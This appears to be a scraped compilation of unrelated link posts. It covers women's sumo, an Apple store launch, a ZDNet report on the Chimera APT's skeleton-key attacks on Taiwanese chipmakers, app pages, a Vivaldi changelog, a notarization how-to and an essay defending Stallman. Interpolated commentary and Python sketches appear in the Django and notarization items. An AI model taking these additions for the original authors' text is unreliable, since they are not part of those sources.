Contemporary women's sumo wrestling match (image caption)

Female sumo is not considered to be authentic by most Japanese and is now prohibited from taking place in professional settings, but it exists on an amateur level. [5][6][7] The International Sumo Federation and its events (such as the Sumo World Championships and European Sumo Championships) allow female competitors. Women's sumo is an event at the World Games and was also featured at the 2013 World Combat Games. [8] The first national championship for amateur women's sumo was held in 1997. The rules are identical to professional sumo, with the exception that the wrestlers wear leotards under a mawashi, and the matches last three minutes instead of five minutes as in professional sumo. [9]

Notable female sumo wrestlers include Hiyori Kon, Miki Satoyama, Sharran Alexander, Julia Dorny, Hetal Dave, Edyta Witkowska, Seika Izawa, Epp Mäe, Anna Zhigalova, Vera Koval, Svitlana Iaromka, Sandra Köppen, Maryna Pryshchepa, Yonamine Chiru, and Françoise Harteveld.

References: [2] Dennis J. Frost (2010), ISBN 978-0674056107, p. 48.
24
Apple Marina Bay Sands Opens Thursday in Singapore
PRESS RELEASE, September 7, 2020

Apple Marina Bay Sands opens Thursday in Singapore. Apple's most ambitious retail project sits on the waters of Marina Bay.

Singapore — Apple today previewed Apple Marina Bay Sands, the first Apple Store to sit directly on the water. Appearing as a sphere floating on the iridescent Marina Bay, the store introduces a new and captivating retail experience at one of the most iconic locations in Singapore. Entirely surrounded by water, Apple Marina Bay Sands offers uninterrupted 360-degree panoramic views of the city and its spectacular skyline. The sphere is a first-of-its-kind, all-glass dome structure that is fully self-supported, comprised of 114 pieces of glass with only 10 narrow vertical mullions for structural connection. As Apple's third retail location in Singapore, the new store creates an unforgettable space for customers.

Inspired by the Pantheon in Rome, an oculus located at the apex of the dome provides a flooding ray of light that travels through the space. The interior of the glass is lined with custom baffles, each uniquely shaped to counter sun angles and provide a nighttime lighting effect. With trees lining the interior of the dome, the green garden city of Singapore flows into the store, providing additional shading and soft shadows through the foliage.

"We couldn't be more excited to open the breathtaking Apple Marina Bay Sands in Singapore, building on our commitment to this special place that began more than 40 years ago," said Deirdre O'Brien, Apple's senior vice president of Retail + People. "Our passionate and talented team is ready to welcome this community to our new store and deliver the care and support that our customers around the world love."

Visitors entering the store encounter a dramatic reveal into the massive volume of the dome, where they can explore curated Apple products and accessories, receive personal technical support from Geniuses, or simply take in the stunning view of Marina Bay. The Forum is centered around a Video Wall, which will serve as the stage for Today at Apple sessions featuring Singapore's artists, musicians, and creators. Entrepreneurs and developers interested in receiving training and advice can meet with Apple team members in Apple's first underwater Boardroom, located on the lower level of the store.

Apple's rich history in Singapore spans more than 40 years, beginning with the first corporate office in Ang Mo Kio. In 1981, the team was responsible for producing the majority of printed circuit boards for Apple II computers worldwide. Since then, Apple has expanded its corporate and retail presence, and now supports over 55,000 jobs across the entire Apple ecosystem. The 148-person team at Apple Marina Bay Sands, who collectively speak over 23 languages, will welcome visitors for the first time on Thursday, September 10 at 10 a.m. SGT. The store will implement the same rigorous health measures for both employees and visitors seen across all Apple Store locations, including a mask requirement, temperature checks, and social distancing. To ensure the health and well-being of guests, visits to Apple Marina Bay Sands on Thursday will be by appointment only. Customers can visit apple.com/sg/marinabaysands to choose from available times, and each non-transferable reservation admits one person. Capacity will be limited, so guests may experience wait times before entering the store.
2
Black Hat: Hackers are using skeleton keys to target chip vendors
Targeted attacks against semiconductor companies in Taiwan may not be well-known, but this does not mean the ripple effect of a successful hack would not be felt worldwide.

Over the past decade, Taiwan has slowly established itself as a hotbed for chip companies in both development and production. Taiwan Semiconductor Manufacturing Company (TSMC) is a major player in the field and, over time, the market value of the overall semiconductor and equipment manufacturing sector in the country has increased. The technology industry is a top target for advanced persistent threat (APT) groups, given the often-lucrative and valuable intellectual property -- as well as customer data -- that companies in the sector guard.

At Black Hat USA on Thursday, CyCraft Technology researchers Chung-Kuan Chen and Inndy Lin described a set of attacks believed to have been conducted by the same Chinese APT group in the quest for semiconductor designs, source code, software development kits (SDKs), and other proprietary information. "If such documents are successfully stolen, the impact can be devastating," the researchers said. "The motive behind these attacks likely stems from competitors or even countries seeking to gain a competitive advantage over rivals."

According to the team, attacks have been launched on numerous semiconductor vendors located at the Hsinchu Science Industrial Park in Taiwan. To date, it is thought at least seven vendors -- as well as their subsidiaries -- have been attacked by the same APT group in what the team calls "precise and well-coordinated attacks."

Dubbed Operation Chimera, also known as Skeleton, the APT launched a series of attacks throughout 2018 and 2019 with a variety of tools, including Cobalt Strike -- a legitimate penetration testing tool that threat actors are known to abuse -- and a custom skeleton key derived from code ripped from both Dumpert and Mimikatz.

In two case studies described in CyCraft's whitepaper (.PDF), a variety of endpoints and user accounts were found to be compromised at the time malware infections were detected. Initial access came from a valid corporate ID -- potentially stolen in a separate data breach -- and a virtual private network (VPN) connection in the first case. "Many enterprises often neglect this attack vector, by default trusting VPN connections and welcoming them into their intranet; and Chimera is one of the most skilled threat actors that we have seen at abusing VPN policies," the researchers added.

In the following stage of the attack chain, a remote desktop protocol (RDP) was used to gain access to company servers. During the second Chimera attack, abnormalities were discovered during a network upgrade in which the malware payload was directly injected into system memory, made possible through encoded PowerShell scripts.
Once loaded into a compromised network, an adapted version of Cobalt Strike masqueraded as a Google Update function (GoogleUpdate.exe), while actually establishing backdoor beacons and persistence mechanisms. To exfiltrate data from an infected machine, Chimera makes use of an old version of RAR, a legitimate archive program, which has also been tampered with for malicious purposes. The customized tool, dubbed ChimeRAR, archives data harvested from a network and transfers it to a command-and-control (C2) server controlled by the cyberattackers. To further mask its activity, the threat group also hosted multiple C2s on the Google Cloud platform and through Microsoft Azure, as well as via other public cloud services.

The skeleton key, however, is perhaps the most interesting weapon in Chimera's arsenal. Dell Secureworks' Counter Threat Unit first documented the use of a skeleton key able to bypass authentication checks on Active Directory (AD) servers back in 2015, giving cybercriminals unfettered access to remote access services. Chimera's tool, named "SkeletonKeyInjector," is designed to be implanted into AD and domain controller (DC) servers, allowing the cyberattackers to move laterally across a network and to make direct syscalls, thereby circumventing existing security software. Code snippets taken from Mimikatz and Dumpert give the malware the capability to bypass API monitoring, a common defense mechanism used by today's antivirus and endpoint protection solutions.

"The malware altered the New Technology LAN Manager (NTLM) authentication program and implanted a skeleton key to allow the attackers to log in without the need of valid credential[s]," the researchers said. "Once the code in memory was altered, the attackers could still gain access to compromised machines even after resetting passwords."

The team adds that as AD machines rarely receive a reboot, skeleton keys could go undetected for long periods, which also facilitates the threat actors' wish to move laterally across networks without detection. In one of the firm's case studies, the APT group was present for roughly a year before being removed from the compromised network. "Based on the stolen data, we infer that the actor's goal was to harvest company trade secrets," CyCraft says. "The motive may be related to business competition or a country's industrial strategy."

ZDNet has reached out to the researchers with additional queries and will update when we hear back.
5
Show HN: PolyGit, a Simple iOS Git Client
Update your repositories from anywhere. Git can be complicated; PolyGit makes it understandable. Designed for simplicity and ease of use, your entire commit history is accessible with just a few taps. Git has never been easier than this.

Commit Graph: Visualize the connections between your commits, branches and tags. Get a deeper understanding of your repository by viewing the Directed Acyclic Graph underpinning Git.

Stage and Push Changes: Make quick updates on the go and push commits in seconds. Stage, unstage and discard hunks with an intuitive UI.

Effortless Text Editing: Syntax highlighting for more than 75 languages makes editing code a breeze. Keyboard shortcuts accelerate common actions like indenting and selecting lines.

Merge, Rebase, Cherry-pick & More: Modify your repository with confidence. Git's powerful commands are here with detailed previews so you always make the right changes.

Additional Features:
Markdown and HTML Previews: View live previews of your documents in PolyGit or Safari.
Merge Tool: Use the built-in merge tool to resolve merge conflicts with a simple tap.
Find and Replace: Find all instances of a string and incrementally replace instances of that text.
GitHub, GitLab and Bitbucket Integration: Sign in with your Git provider to view all your repositories and easily clone them.
Horizontal and Vertical Scrolling: Set the 'Column Wrap Width' in Settings to disable line wrapping and scroll horizontally through your files.

FAQ

How can I authenticate if I have 2-factor auth enabled? You will need to generate a personal access token on GitHub, an app password on Bitbucket, or a personal access token on GitLab and use that to authenticate. See here for more information.

How can I authenticate using SSH? You will need to export the app's SSH key and add it to your Git provider. You can copy the key by navigating to Settings and then Credentials. Select 'Export Public Key' and then 'Copy Key'. See here for more information.
4
A free, open-source, and completely encrypted notes app
Stand for privacy. Write fearlessly. Standard Notes helps you gain control in a world that often feels out of control. Protect your life's work with end-to-end encryption, advanced security, and unmatched privacy controls.

A steel vault for your most sensitive data. Standard Notes protects your notes and files with 4x-audited, industry-leading end-to-end encryption, meaning only you have access to the keys required to decrypt your information. Safely store all your sensitive data in one place and access it from all your devices, resting assured that your data is always protected by the highest security standards. Explore our features.

Write fearlessly. Note-taking services like Evernote, Google Keep, Notion, and Simplenote cannot prevent employees and governments from reading your data. Standard Notes features advanced security measures and privacy controls that protect your data against hacks, data breaches, government access, and even employee access. Read how we protect your data.

Your notes and files, always. Never worry about losing your data again. You'll always have an offline copy of your data, so you can access your notes and files even without an internet connection. Automated backups and secure cloud sync ensure that your data is safe and sound, even if your device is lost, damaged, or stolen. View our plans.

Take back your data. Shape-shifting privacy policies and unauthorized access by #BigTech and other non-encrypted services can lead to leaks, doxing, financial fraud, identity theft, loss of control over your information, and other existential harms to you or your business. Safeguard your private data with zero-knowledge encryption and audited, open-source applications by Standard Notes. Read our security audits.

Download Standard Notes: unlimited notes, unlimited devices, all for free. Want more? Learn about our plans.

Who is Standard Notes? We're an independent company founded on an ethos of software sustainability and ethical data practices. Our code is completely open-source and independently audited by leading security researchers. 100% of revenue comes from paying users, $0 in venture capital, 7 years in service. Read our longevity statement.
171
Vivaldi Browser 5.0
Get all of the highlights and details of this release by visiting the blog. • [New][Themes] Theme sharing (VB-38363) • [New][Translate][Panel] Provide a new way to translate selections and arbitrary text (VB-80593) • [New][Address bar][Download] Offer additional way of showing downloads (VB-80226) • [New][Page Actions][Chain Commands][Keyboard][Gestures] Handle page actions as commands (VB-82950) • [New][Chain Commands] Add parameter to search with selection command: to specify search engine (VB-81860) • [New][Linux]Provide rpm packages for ARM and ARM64 (VB-84132) • [Address bar] Checking a URL with a search engine goes to URL instead of searching (VB-84115) • [Address bar] URL in address field not updated after opening a site from Bookmarks menu (VB-83568) • [Address bar] URLs with encoded characters are not properly encoded when copying the URL (VB-77574) • [Blocker][Keyboard] Tracker blocking badge is not keyboard accessible (VB-65331) • [Bookmarks] Duplicate text overlaid on javascript and mailto URLs (VB-81608) • [Capture] Button not translated (VB-84477) • [Capture] Dragging isn’t possible after screenshot (VB-84242) • [Capture] Missing UI for screenshot of area (VB-83510) • [Chromium] Upgraded to 96.0.4664.51 • [Download] Doesn’t finish although it reach 100% (VB-83809) • [Download] Data blob download fails (VB-84157) • [Gestures][Keyboard] Translate Page Not Available as a Command (VB-82214) • [Gestures][Settings] Animation not displaying (VB-82288) • [Linux][Media] Update proprietary codecs to 98.0.4710.4—104707 • [Locale] Swedish system long date format incorrect (VB-73701) • [Menus] Improve capability to recover from broken syntax in menu files (VB-84124) • [Menus][PWA][Speed Dials] Useless “Create shortcut…” context menu item (VB-83236) • [Panels] Can’t open “windows with N tabs” in window panel (VB-83590) • [Panels][Download] Missing information if disk is full (VB-77323) • [Panels][Download] Order of entries in download panel change on click after download finished (VB-69518) • [Panels][Tabs] Sort tabs by domain has stopped working (VB-84492) • [Performance] Enable backward/forward cache by default (VB-83644) • [Performance][Address bar] Improve performance by doing less re-rendering (VB-83559) • [Performance][Tabs] Fewer avoidable re-renders while dragging tabs (VB-83498) • [Periodic reload][Tabs] Only affects last selected tab in a group of tabs (VB-84439) • [Privacy] Add .gitignore file to profile folder; A warning should display if the profile might be in a Git repository (VB-84485) • [Quick Commands] Should take history state into account with autocomplete (VB-83489) • [Quick Commands] Tune history search (VB-82876) • [Reader Mode] Failing in some cases when it should not (VB-83689) • [Speed Dial] Cannot rename bookmark by clicking on the title; cut/copy/paste in the title field doesn’t work (VB-81991) • [Speed Dial] Opening a page from a folder, then going back does not return you to the folder (VB-84101) • [Speed Dial][Search] Ask users to consider using Startpage instead of Google (VB-73553) • [Sync] Can’t use $ in password (VB-83806) • [Tabs] Dragging should update less when animations are off (VB-83757) • [Tabs] Dragging tab selects another tab (VB-83758) • [Tabs] When tab bar is hidden, a new tab from a stack opens outside the stack (VB-79128) • [Tabs][Keyboard] F6 focus selection disappears on tab stacks (VB-83959) • [Tabs][Performance] Poor performance with many tabs (VB-84121) • [Translate] Better error handling to improve automatic detection (VB-84434) • 
[Translate] Error in console when loading XML file (VB-83681) • [Translate] Selection button and popup might end up below the page (VB-83429) • [Windows][Media] Sound occasionally fails: fixes some of these instances (VB-82763) • [Calendar Beta] Add option to not show notifications (VB-84425) • [Calendar Beta] Allow selecting which calendars to sync on account setup (VB-84584) • [Calendar Beta] Assign or allow keyboard shortcut to refresh Calendar (VB-74323) • [Calendar Beta] Cannot connect to NextCloud CalDAV (VB-74906) • [Calendar Beta] Changing the color of local Calendar does not work (VB-83986) • [Calendar Beta] Deleting Vivaldi Calendar account hangs (VB-84030) • [Calendar Beta] Duplicate event created when using done button (VB-84384) • [Calendar Beta] Empty event with default notification is saved (VB-83664) • [Calendar Beta] Filter does not apply for tasks in agenda view (VB-83455) • [Calendar Beta] Hide “+” when editing event (VB-64642) • [Calendar Beta] Import iCal file into new Calendar (VB-84031) • [Calendar Beta] Imported ICS calendar containing events with no range doesn’t sync (VB-82935) • [Calendar Beta] Prevent update of web calendar from invite email (VB-84178) • [Calendar Beta] Setting for opening ICS files in Vivaldi or use OS default app (VB-56573) • [Calendar Beta] Setting up CalDAV or Google calendar is slow with many events (VB-83847) • [Calendar Beta] Status button shows events from hidden calendars (VB-84459) • [Calendar Beta] Store and use credentials when accessing Web Calendar (VB-83462) • [Calendar Beta] Web calendar event duplication (VB-84051) • [Calendar Beta][CalDAV] Changing calendar color does not work for online Calendars (VB-84001) • [Calendar Beta][Keyboard] Define command for shortcuts compatible with Google calendar: allows for shortcuts to be different between Browser, Calendar and Mail (VB-83320) • [Calendar Beta][Mail Beta] Error logger improvements (VB-84064) • [Calendar Beta][Mail Beta] Status button logs overflow (VB-84454) • [Calendar Beta][Panel] Creating a new event for today in the panel fails (VB-83808) • [Feeds Beta] Add feed dialog should allow adding an incomplete feed (VB-84424) • [Feeds Beta] Quirksmode feed causes several parsing issues (VB-83459) • [Feeds Beta] When parsing of a feed fails, it halts loading of all remaining feeds (VB-83819) • [Mail Beta][Calendar Beta] Add logs to status popup (VB-84024) • [Mail Beta] Add Oauth support for Office365/Outlook (VB-83729) • [Mail Beta] Add back threading toggle button (VB-84028) • [Mail Beta] Add “Rename Mailing List” to context menu (VB-83175) • [Mail Beta] Deleting from All Messages not working (VB-82670) • [Mail Beta] IMAP account setting for upload to Sent folder or not (VB-70666) • [Mail Beta] Implement new import UI: work in progress (VB-83982) • [Mail Beta] Import from M2 does not always put sent messages in sent folder (VB-83540) • [Mail Beta] Import – allow selecting accounts to include (VB-84133) • [Mail Beta] Inbox navigates to composer after closing a composer tab (VB-84412) • [Mail Beta] Links can get linkified incorrectly (VB-84003) • [Mail Beta] Mail list sorting (VB-28216) • [Mail Beta] Mail status popup fails for BCC-messages (VB-83623) • [Mail Beta] Messages sent to self don’t show in ‘received’ (VB-74552) • [Mail Beta] No result when putting symbols in search without quotation (VB-81236) • [Mail Beta] POP errors are too generic (VB-83516) • [Mail Beta] Performance fix for getting next filtering request • [Mail Beta] Retries too fast on failed connection (VB-83961) • 
[Mail Beta] Search does not find emails with txt attachments (VB-75874) • [Mail Beta] Some text in email is rendered in pure white color (VB-83925) • [Mail Beta] Support actions for filters: first actions are mark read, add/remove label (VB-79165) • [Mail Beta] Temporarily out of sync with server (VB-83577) • [Mail Beta] Undo fails at times (VB-64787) • [Mail Beta] Unnecessary confirm delete dialogs (VB-84118) • [Mail Beta] Wrong hover color on dropdown toolbar buttons (VB-84409) • [Mail Beta][Settings] Deleted mailing list filters can never be restored, with settings open in a new window (VB-84625)
2
The original anti-vaxxers: Edward Jenner contributed to today’s culture wars
The Economist
1
Microsoft trained AI to find software bugs using hide-and-seek
[News] Microsoft researchers: We've trained AI to find software bugs using hide-and-seek (zdnet.com)
3
Sidekiq NV100: Embeddable SDR and GPS M.2 formatted module for wideband wireless
Sidekiq™ NV100: embeddable M.2 2280 SDR with integrated pre-select filters and GPS.

Exceptional RF tuning, fidelity and instantaneous dynamic range in a tiny SDR, compatible with millions of computer systems. Sidekiq NV100 is a highly flexible RF powerhouse optimized to tackle your most challenging signal environments. It combines the Sidekiq family's state-of-the-art wideband RF processing capabilities with an integrated GPS clock and flexible Rx pre-select filtering, all in a common form factor with wide compatibility out of the box.

RF Tuning Range: 30 MHz to 6 GHz (RF access down to 10 MHz)
RF Bandwidth: Up to 50 MHz per channel
Power Consumption: 4-6 W (typical usage)
Integrated FPGA: Xilinx Artix 7 XC7A50T FPGA with x2 Gen2 PCIe interface
Form Factor: M.2 2280 Key B + M (22 mm x 80 mm x 4.5 mm)
I/O: PCIe Gen2 x2 (5 Gbps) + GPIO
RF Modes of Operation: 2 Rx, 2 Tx, or 1 Tx + 1 Rx
GPS: Integrated GPSDO receiver with PPS
Filtering: Sub-octave Rx pre-selection from 400 MHz to 6 GHz

Widely compatible M.2 2280 form factor. Based on Analog Devices' ADRV9004, a wideband transceiver RFIC that delivers extended RF tuning capabilities as well as exceptional RF fidelity and instantaneous dynamic range, Sidekiq NV100 packs RF flexibility into the tiny M.2 2280 form factor, commonly utilized for solid state hard drives that support NVMe® in laptops, tablets, and other computing platforms.

A common form factor. Because Sidekiq NV100 comes in the M.2 2280 form factor (commonly found on the motherboards of laptops and tablets for adding fast NVMe SSDs), high performance off-the-shelf host platforms are easy to find, source, and integrate with an SDR running your RF application.

Use as a Thunderbolt™ 3 peripheral with our Thunderbolt™ 3 housing. The Sidekiq NV100 is also available in a Thunderbolt 3 carrier with a small enclosure (providing SMA ports for RF, and a Thunderbolt 3 compatible USB-C connector for both power and connectivity to the host).

Use as a compact RF platform with our Intel® NUC Development Kit. Looking for a compact, high performance compute platform with an integrated Sidekiq NV100? To support customers that are looking for a complete SDR + high performance computer solution in a small form factor, Epiq Solutions offers Sidekiq NV100 pre-integrated into an Intel NUC computer. For more information on the NUC + NV100 offering, contact us.

Intel Core i7 quad-core x86 CPU
NUC I/O includes USB3, gigabit ethernet, Thunderbolt™ 3, and HDMI
Extended chassis to provide access to Rx/Tx/GPS antenna ports, as well as 10 MHz input and PPS input
16 GB RAM
1 TB SSD (2.5")
Pre-loaded with Ubuntu Linux (18.04)
Sidekiq NV100 JTAG and GPIO access

Integrated features to simplify your product development:

Integrated GPS: Sidekiq NV100 includes an integrated GPS receiver and GPS-disciplined oscillator (GPSDO) for excellent long-term positioning accuracy. It also includes a 40 MHz output that can be passed to another Sidekiq.

Integrated Pre-Select Filters: If you need a receiver that enables optimum interference protection, Sidekiq NV100 is for you. The sub-octave Rx pre-select filtering provides out-of-band interference protection on both RF receiver paths from 400 MHz to 6 GHz. While other solutions need to connect to a bulky, external filtering mechanism, Sidekiq NV100 incorporates this filtering into its small, standard M.2 2280 form factor, allowing you to either save space and reduce your product size, or free up space to accommodate other technology needs.
Ready to Develop We have tools to help get you started LOADED LINUX NUC One Intel® NUC running Ubuntu, with one Sidekiq NV100 card pre-installed SOFTWARE API An easy-to-use interface for configuring the RF transceivers and streaming data between the host and Sidekiq NV100 over the PCIe interface PRE-LOADED APPS PC-based spectrum analyzer (ERA) and libsidekiq Linux software library pre-loaded on the NUC JTAG FIXTURE One JTAG fixture with an additional Sidekiq NV100 and Thunderbolt™3 cable FPGA REFERENCE Sidekiq NV100 FPGA reference design source code to enable user-customized FPGA designs 1 YEAR OF SUPPORT One year warranty, software updates and web-based support Talk to an Expert
1
Upload Multiple Images to a Model with Django
By Juli Colombo, published in Ibisdev, Aug 20, 2020 (5 min read).

Get flexibility without having several image fields. Very often in projects, especially in ecommerces, the client wants to link an image to a product. Way too much time has passed by for me to learn that most of the time the requirement changes in the middle of the project: the client has to be able to upload more than one image to a merchandise. And not only that, the amount of images…
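The article text is cut off above, but the approach it is building toward can be sketched: rather than adding several image fields to one model, give images their own model with a foreign key back to the product, so a product can carry any number of images. A minimal, hypothetical Django sketch follows; the Product and ProductImage names and fields are illustrative assumptions, not taken from the article.

# models.py -- illustrative sketch only; model and field names are assumptions, not from the article
from django.db import models

class Product(models.Model):
    name = models.CharField(max_length=200)

    def __str__(self):
        return self.name

class ProductImage(models.Model):
    # Each row stores one image and points back at its product,
    # so one product can have any number of images.
    product = models.ForeignKey(Product, related_name="images", on_delete=models.CASCADE)
    image = models.ImageField(upload_to="products/")

With this layout, product.images.all() returns every image attached to a product, and the image set can be edited in the admin as an inline on the product page instead of as a fixed number of fields.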
1
Fortune Telling Businesses Booming During Covid-19 Pandemic
1
Easily search a library of factual claims and their sources
òtító: tools to crowdsource facts and fight misinformation. òtító is a new media format that empowers us all to crowdsource and moderate factual information. It includes checks and balances, and software tools to incentivise healthy behaviours and discourage unhealthy or adversarial approaches to discourse.
1
What exactly is the difference bw Deployments and StatefulSets
1
Selecting iTunes Provider for Notarization
When uploading your package for notarization, altool could fail with the following error message:

Error: Your Apple ID account is attached to other iTunes providers. You will need to specify which provider you intend to submit content to by using the -itc_provider command. Please contact us if you have questions or need help. (1627)

This usually happens if you use your Apple ID for uploading something other than software. Examples are books (for Apple Books) and music (for Apple Music and/or the iTunes Store). In this case, you would need to specify which provider name you are using. These provider names are unique, dependent on the account and which store they are for. That is, Apple will create one string for the entity that uploads to the App Store and another string for the Apple Books store. If you sign up to the stores as a natural person (instead of an organization), these strings would be derived from your legal name and be unique to your account.

Since you're using altool, you'll want to use the provider name associated with the App Store, even though your intention with notarization is Developer ID distribution outside the App Store. Confused? Read on and you'll be notarizing your binaries in no time. I'll show you how to get all provider names associated with your account and select which one to use to continue with notarization. Be sure to have these on-hand, which you probably have since you're already using altool.

You can get the list of provider names attached to your account by running iTMSTransporter from the command line. This is a Java program embedded in Xcode which it uses internally for uploading to the App Store. Apparently this program is also used by media labels to upload music and videos to Apple.

/Applications/Xcode.app/Contents/Developer/usr/bin/iTMSTransporter -m provider -u "your.name@example.com" -p "app-specific-password"

Be sure to replace your Apple ID and your app-specific password as appropriate. The command would return a listing like the following:

- Long Name - - Short Name -
1 Your Name YourName
2 Your Name|123456789 YourName123456789

What you want is to pick out the short name listed and use it as a parameter to altool for specifying the provider name. Follow these steps to select the right provider name.

Finally, add the provider name as a parameter to altool. Despite what the error message said, the parameter to specify the provider name is --asc-provider, not -itc_provider. Probably because altool is a wrapper for the Java-based iTMSTransporter and the two development groups haven't gotten around to synchronizing the error message with the parameter. Run a command like the following to notarize your bundle. Notice the new argument --asc-provider, which takes the provider short name as its parameter.

xcrun altool --notarize-app --primary-bundle-id com.example.YourApp -u "your.name@example.com" -p "app-specific-password" --asc-provider "ProviderName123456789" --file YourAppBundleCompressed.zip

Remember to replace the parameters like bundle identifier and Apple ID credentials as appropriate. Also note that altool takes a single file as an argument, hence you'll need to zip your bundle or enclose it in a disk image.
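If you do this regularly, the two steps can be wrapped in a small script. Here is a minimal Python sketch under those assumptions: it reuses only the iTMSTransporter path and altool flags quoted above, and the Apple ID, app-specific password, bundle ID, zip name, and provider short name are placeholders you must replace.

# notarize.py -- illustrative sketch; commands and flags are the ones quoted above,
# all credentials and names below are placeholders
import subprocess

TRANSPORTER = "/Applications/Xcode.app/Contents/Developer/usr/bin/iTMSTransporter"
APPLE_ID = "your.name@example.com"
APP_PASSWORD = "app-specific-password"  # an app-specific password, not your account password

def list_providers():
    # Step 1: print the long/short provider names attached to the account.
    subprocess.run([TRANSPORTER, "-m", "provider", "-u", APPLE_ID, "-p", APP_PASSWORD], check=True)

def notarize(zip_path, bundle_id, provider_short_name):
    # Step 2: upload the zipped bundle for notarization under the chosen provider.
    subprocess.run([
        "xcrun", "altool", "--notarize-app",
        "--primary-bundle-id", bundle_id,
        "-u", APPLE_ID, "-p", APP_PASSWORD,
        "--asc-provider", provider_short_name,
        "--file", zip_path,
    ], check=True)

if __name__ == "__main__":
    list_providers()
    # Once you know the App Store provider's short name, uncomment and fill in:
    # notarize("YourAppBundleCompressed.zip", "com.example.YourApp", "ProviderName123456789")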
1
Watch how a paper can cut the scissors
51
Nadine Strossen and Hannah Wolfman-Jones Rebut Accusations Against Stallman
Published on April 05, 2021. Hannah Wolfman-Jones [*] had already chosen Stallman as a coauthor when the call for his cancellation broke up in September 2019. Confronted with a dilemma, Hannah sought the advice of coauthor Nadine Strossen [**] . Here are her thoughts and the response she received from Nadine, extracted verbatim with their permission from the original (Archived) -- worth reading. by Hannah Wolfman-Jones - May 11, 2020 As someone who had recently become an associate of thought-criminal Richard Stallman, I would be lying if I said this guilt-by-association didn’t give me pause. The idea of my name being smeared all over the internet by a mob of strangers is not particularly appealing. It’s the type of thing that makes one not want to speak up at all: a real chilling effect. Hannah Wolfman-Jones The task ahead of me was a difficult one. See, I had already recruited Stallman to be part of the We The Web L3C experiment in collaboration that is the book . So now, like MIT and the Free Software Foundation I had to make a decision: do I keep him on the project or boot him? Luckily, another co-author on the book has spent a lot of time pondering inclusion, women’s rights, children’s rights, and free speech. Her name is Nadine Strossen and her credentials run deep. She served as the first female President of the American Civil Liberties Union (ACLU), America’s largest and oldest civil liberties nonprofit, from 1991 to 2008. When she stepped down as President, three Supreme Court Justices participated in her farewell luncheon (Ruth Bader Ginsburg, Antonin Scalia, and David Souter). Strossen is a Professor Emeritus at New York Law School and currently an advisor to the EPIC (Electronic Privacy Information Center), FIRE (Foundation for Individual Rights in Education), the ACLU, and Heterodox Academy. She is the author of the widely acclaimed books (2018) and (1995). She has far too many awards, publications, and prominent appearances to name. I talked with her to explain the dilemma and get her thoughts. by Nadine Strossen - May 11, 2020 I find it so odd that the strong zeal for revenge and punishment if someone says anything that is perceived to be sexist or racist or discriminatory comes from liberals and progressives! There are so many violations [in cases like Stallman’s] of such fundamental principles to which progressives and liberals cling in general as to what is justice, what is fairness, what is due process. One is proportionality: that the punishment should be proportional to the offense. Another one is restorative justice: that rather than retribution and punishment, we should seek to have the person constructively come to understand, repent, and make amends for an infraction. Liberals generally believe society to be too punitive, too harsh, not forgiving enough. They are certainly against the death penalty and other harsh punishments even for the most violent, the mass murderers. Progressives are right now advocating for the release of criminals, even murderers. To then have exactly the opposite attitude towards something that certainly is not committing physical violence against somebody, I don’t understand the double standard! Nadine Strossen Another cardinal principle is we shouldn’t have any guilt by association! 
[To hold culpable] these board members who were affiliated with him and ostensibly didn’t do enough to punish him for things that he said—which by the way were completely separate from the Free Software Foundation—is multiplying the problems of unwarranted punishment. It extends the punishment where the argument for responsibility and culpability becomes thinner and thinner to the vanishing point! That is also going to have an enormous adverse impact on the freedom of association, which is an important right protected in the U.S. by the First Amendment. The Supreme Court has upheld freedom of association in cases involving organizations that were at the time highly controversial. It started with NAACP (National Association for the Advancement of Colored People) during the civil rights movement in the 1950s and 60s, but we have a case that’s going to the Supreme Court right now regarding Black Lives Matter. The Supreme Court says even if one member of the group does commit a crime—in both of those cases physical violence and assault—that is not a justification for punishing other members of the group unless they specifically intended to participate in the particular punishable conduct. Now, let’s assume for the sake of argument, Stallman had an attitude that was objectively described as discriminatory on the basis on race and gender (and by the way I have seen nothing to indicate that), that he’s an unrepentant misogynist, who really believes women are inferior. We are not going to correct those ideas, to enlighten him towards rejecting them and deciding to treat women as equals through a punitive approach! The only approach that could possibly work is an educational one! Engaging in speech, dialogue, discussion and leading him to re-examine his own ideas. Even if I strongly disagree with a position or an idea, an expression of an idea, advocacy of an idea, and even if the vast majority of the public disagrees with the idea and finds it offensive, that is not a justification for suppressing the idea. And it’s not a justification for taking away the equal rights of the person who espouses that idea including the right to continue holding a tenured position or other prominent position for which that person is qualified. But a number of the ideas for which Richard Stallman has been attacked and punished are ideas that I as a feminist advocate of human rights find completely correct and positive from the perspective of women’s equality and dignity! So for example, when he talks about the misuse and over use and flawed use of the term sexual assault, I completely agree with that critique! People are indiscriminantly using that term or synonyms to describe everything from the most appaulling violent abuse of helpless vulnerable victims (such as a rape of a minor) to any conduct or expression in the realm of gender or sexuality that they find unpleasant or disagreeable. #strossen-rms-ideas So we see the term sexual assault and sexual harrassment used for example, when a guy asks a woman out on a date and she doesn’t find that an appealing invitation. Maybe he used poor judgement in asking her out, maybe he didn’t, but in any case that is NOT sexual assault or harassment. To call it that is to really demean the huge horror and violence and predation that does exist when you are talking about violent sexual assault. 
People use the term sexual assault / sexual harassment to refer to any comment about gender or sexuality issues that they disagree with or a joke that might not be in the best taste, again is that to be commended? No! But to condemn it and equate it with a violent sexual assault again is really denying and demeaning the actual suffering that people who are victims of sexual assault endure. It trivializes the serious infractions that are committed by people like Jeffrey Epstein and Harvey Weinstein. So that is one point that he made that I think is very important that I strongly agree with. #not-sexual-assault Secondly and relatedly, [Richard Stallman] never said that he endorse child pornography, which by definition the United States Supreme Court has defined it multiple times is the sexual exploitation of an actual minor. Coerced, forced, sexual activity by that minor, with that minor that happens to be filmed or photographed. That is the definition of child pornography. He never defends that! What the point he makes, a very important one, which the U.S. Supreme Court has also made, is mainly that we overuse and distort the term child pornography to refer to any depiction of any minor in any context that is even vaguely sexual. So some people have not only denounced as child pornography but prosecuted and jailed loving devoted parents who committed the crime of taking a nude or semi-nude picture of their own child in a bathtub or their own child in a bathing suit. Again it is the hysteria that has totally refused to draw an absolutely critical distinction between actual violence and abuse, which is criminal and should be criminal, to any potentially sexual depiction of a minor. And I say potentially because I think if you look at a picture a parent has taken of a child in a bathtub and you see that as sexual, then I’d say there’s something in your perspective that might be questioned or challenged! But don’t foist that upon the parent who is lovingly documenting their beloved child's life and activities without seeing anything sexual in that image. This is a decision that involves line drawing. We tend to have this hysteria where once we hear terms like pedophilia of course you are going to condemn anything that could possibly have that label. Of course you would. But societies around the world throughout history various cultures and various religions and moral positions have disagreed about at what age do you respect the autonomy and individuality and freedom of choice of a young person around sexuality. And the U.S. Supreme Court held that in a case involving minors right to choose to have an abortion. By the way, [contraception and abortion] is a realm 